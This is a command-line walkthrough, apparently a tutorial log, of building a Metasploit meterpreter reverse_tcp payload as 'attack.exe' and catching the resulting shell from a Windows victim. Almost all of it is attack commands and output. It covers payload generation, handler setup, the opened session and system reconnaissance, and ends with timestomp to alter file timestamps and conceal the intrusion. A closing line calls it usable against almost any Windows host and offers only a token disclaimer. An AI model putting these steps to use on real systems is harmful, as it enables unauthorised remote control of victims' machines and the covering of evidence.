~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe > /root/attack.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/attack.exe (virus)
~# service postgresql start
~# msfconsole
msf > db_status
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.117 (Kali Linux host)
msf exploit(handler) > set lport 1234
msf exploit(handler) > show options
msf exploit(handler) > exploit -h
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.117:1234
msf exploit(handler) > [*] Starting the payload handler...
The handler starts listening.
The Windows host runs attack.exe.
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.1.94
[*] Meterpreter session 1 opened (192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500 (session 1 opens after the Windows host runs attack.exe)
msf exploit(handler) > sessions -i
Active Sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 Meterpreter x86/win32 sh-270\sewells @ SH-270 192.168.1.117:1234 (192.168.1.94:58540)
msf exploit(handler) > sessions -i 1 (1 is the session ID number)
meterpreter > pwd (successful login)
C:\Users\sewells\Desktop
meterpreter > sysinfo
Computer: sh-270
OS: Windows (Build 14393).
Architecture: x64 (Current Process is WOW64)
System Language: zh_CN
Domain: WORKGROUP
Logged On Users: 1
Meterpreter: x86/win32
meterpreter > getuid
Server username: sh-270\sewells
meterpreter > timestomp -h (modify the intrusion time)
meterpreter > timestomp attack.exe -v
Modified: 2017-03-10 00:01:11 -0500
Accessed: 2017-03-10 00:03:26 -0500
Created: 2017-03-10 00:18:07 -0500
Entry Modified: 2017-03-10 00:18:07 -0500
Reverse-connection intrusion (works against almost any Windows host) (do not use it for illegal operations!)